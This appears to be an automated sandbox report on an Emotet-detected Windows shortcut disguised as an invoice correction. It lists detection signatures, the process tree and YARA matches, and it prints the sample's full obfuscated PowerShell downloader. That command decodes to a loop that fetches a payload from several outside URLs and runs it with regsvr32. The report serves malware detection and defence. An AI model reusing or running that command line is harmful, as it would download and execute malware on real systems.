Edit tour
Windows
Analysis Report
Rechnungskorrektur 2022.20.05_1305.lnk
Overview
General Information
| Sample Name: | Rechnungskorrektur 2022.20.05_1305.lnk |
| Analysis ID: | 632058 |
| MD5: | 9bb223b115ec73b8419e37ce00051da9 |
| SHA1: | fe98ee24f390ba1778742f32ad4b22220aaa31ff |
| SHA256: | 66cdacf636ffc45e84ff842fe9c6c217641af99f0e41729b2a3ee8488763ea81 |
| Tags: | lnk |
| Infos: |  |
 | |
Detection
Emotet
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Windows shortcut file (LNK) starts blacklisted processes
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Changes security center settings (notifications, updates, antivirus, firewall)
Suspicious powershell command line found
Machine Learning detection for sample
Suspicious command line found
Powershell drops PE file
Obfuscated command line found
Machine Learning detection for dropped file
Yara detected Obfuscated Powershell
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
AV process strings found (often used to terminate AV products)
PE file contains an invalid checksum
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Registers a DLL
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Classification
- System is w10x64
cmd.exe (PID: 1340 cmdline: C:\Windows \System32\ cmd.exe" / v:on /c DZ 9UkEaBzDep 9CltZVGcsQ uzGzfPdwf8 nTfLANcu0j NEGxiW7Yvn GsgahEnFDk lFWCuez6Py ||p^o^w^e^ r^s^h^e^l^ l.e^x^e -c "&{$vFL=[ System.Tex t.Encoding ]::ASCII;$ FhuEB='ICA gICAgV';$T CeK='3JpdG UtSG9zdCAi emdmSXoiOy RQcm9ncmVz c1ByZWZlcm VuY2U9IlNp bGVudGx5Q2 9udGludWUi OyRsaW5rcz 0oImh0dHA6 Ly9tYW5kb2 0uY28uaWQv YXNzZXRzL1 RwSUl0N1Nt TkJzV0NFQ0 xvSHJTLyIs Imh0dHA6Ly 95YW1hZGEt c2hvc2hpLm 1haW4uanAv eWFtYWRhLX Nob3NoaS9W NjFoSC8iLC JodHRwczov L2Jwc2phbW JpLmlkL2Fi b3V0L1ZQZT Y5QTlUay8i LCJodHRwOi 8vbWFybWFy aXMuY29tLm JyL3dwLWFk bWluLzJjZn BTdUFILyIs Imh0dHA6Ly 9tYXNpZGlv bWFzLmNvbS 9ENFdTdGF0 cy9HQWhtZ3 ZoTGdVbjYv IiwiaHR0cD ovL3BhY2Vt YWtlci5jZC 9pbWFnZXMv WGMvIik7JH Q9Ikp5ZGdW dmJQRCI7JG Q9IiRlbnY6 VE1QXC4uXC R0Ijtta2Rp ciAtZm9yY2 UgJGQgfCBv dXQtbnVsbD tmb3JlYWNo ICgkdSBpbi AkbGlua3Mp IHt0cnkge0 lXUiAkdSAt T3V0RmlsZS AkZFxNZXZn TXZvcGF3Lk JVUztSZWdz dnIzMi5leG UgIiRkXE1l dmdNdm9wYX cuQlVTIjti cmVha30gY2 F0Y2ggeyB9 fQ==';$cFq =[System.C onvert]::F romBase64S tring($Fhu EB+$TCeK); $YnYHG=$vF L.GetStrin g($cFq); i ex ($YnYHG )} MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 4472 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) 
powershell.exe (PID: 1192 cmdline: powershell .exe -c "& {$vFL=[Sys tem.Text.E ncoding]:: ASCII;$Fhu EB='ICAgIC AgV';$TCeK ='3JpdGUtS G9zdCAiemd mSXoiOyRQc m9ncmVzc1B yZWZlcmVuY 2U9IlNpbGV udGx5Q29ud GludWUiOyR saW5rcz0oI mh0dHA6Ly9 tYW5kb20uY 28uaWQvYXN zZXRzL1RwS Ul0N1NtTkJ zV0NFQ0xvS HJTLyIsImh 0dHA6Ly95Y W1hZGEtc2h vc2hpLm1ha W4uanAveWF tYWRhLXNob 3NoaS9WNjF oSC8iLCJod HRwczovL2J wc2phbWJpL mlkL2Fib3V 0L1ZQZTY5Q TlUay8iLCJ odHRwOi8vb WFybWFyaXM uY29tLmJyL 3dwLWFkbWl uLzJjZnBTd UFILyIsImh 0dHA6Ly9tY XNpZGlvbWF zLmNvbS9EN FdTdGF0cy9 HQWhtZ3ZoT GdVbjYvIiw iaHR0cDovL 3BhY2VtYWt lci5jZC9pb WFnZXMvWGM vIik7JHQ9I kp5ZGdWdmJ QRCI7JGQ9I iRlbnY6VE1 QXC4uXCR0I jtta2RpciA tZm9yY2UgJ GQgfCBvdXQ tbnVsbDtmb 3JlYWNoICg kdSBpbiAkb Glua3MpIHt 0cnkge0lXU iAkdSAtT3V 0RmlsZSAkZ FxNZXZnTXZ vcGF3LkJVU ztSZWdzdnI zMi5leGUgI iRkXE1ldmd Ndm9wYXcuQ lVTIjticmV ha30gY2F0Y 2ggeyB9fQ= =';$cFq=[S ystem.Conv ert]::From Base64Stri ng($FhuEB+ $TCeK);$Yn YHG=$vFL.G etString($ cFq); iex ($YnYHG)}" MD5: 95000560239032BC68B4C2FDFCDEF913) 
regsvr32.exe (PID: 5964 cmdline: "C:\Window s\system32 \regsvr32. exe" C:\Us ers\user\A ppData\Loc al\Temp\.. \JydgVvbPD \MevgMvopa w.BUS MD5: D78B75FC68247E8A63ACBA846182740E) - regsvr32.exe (PID: 5640 cmdline:
C:\Windows \system32\ regsvr32.e xe "C:\Win dows\syste m32\UjKMhz Owg\JWwyPP SZDhCDc.dl l" MD5: D78B75FC68247E8A63ACBA846182740E) - svchost.exe (PID: 5964 cmdline:
c:\windows \system32\ svchost.ex e -k unist acksvcgrou p MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 3396 cmdline:
C:\Windows \System32\ svchost.ex e -k Local SystemNetw orkRestric ted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 3120 cmdline:
c:\windows \system32\ svchost.ex e -k local service -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 3364 cmdline:
c:\windows \system32\ svchost.ex e -k netwo rkservice -p -s DoSv c MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 5936 cmdline:
C:\Windows \System32\ svchost.ex e -k Netwo rkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
- SgrmBroker.exe (PID: 5548 cmdline:
C:\Windows \system32\ SgrmBroker .exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
- svchost.exe (PID: 3104 cmdline:
c:\windows \system32\ svchost.ex e -k local servicenet workrestri cted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA) 
MpCmdRun.exe (PID: 7112 cmdline: "C:\Progra m Files\Wi ndows Defe nder\mpcmd run.exe" - wdenable MD5: A267555174BFA53844371226F482B86B) - conhost.exe (PID: 7120 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- svchost.exe (PID: 1296 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 5804 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 6652 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 1004 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 340 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
- cleanup
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| SUSP_PowerShell_Caret_Obfuscation_2 | Detects powershell keyword obfuscated with carets | Florian Roth |
| |
| JoeSecurity_ObfuscatedPowershell | Yara detected Obfuscated Powershell | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security | ||
| JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security | ||
| JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security | ||
| JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security | ||
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
|
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security | ||
| JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security | ||
| JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security | ||
| JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
⊘No Sigma rule has matched
⊘No Snort rule has matched
Click to jump to signature section
Show All Signature Results
AV Detection |   |
|---|
| Source: | ReversingLabs: | ||
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | URL Reputation: | ||
| Source: | URL Reputation: | ||
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | ReversingLabs: | ||
| Source: | ReversingLabs: | ||
| Source: | Joe Sandbox ML: | ||
| Source: | Joe Sandbox ML: | ||
| Source: | Code function: | ||
Networking | |
|---|
| Source: | Network Connect: | ||
| Source: | ASN Name: | ||
| Source: | IP Address: | ||
| Source: | HTTP traffic detected: | ||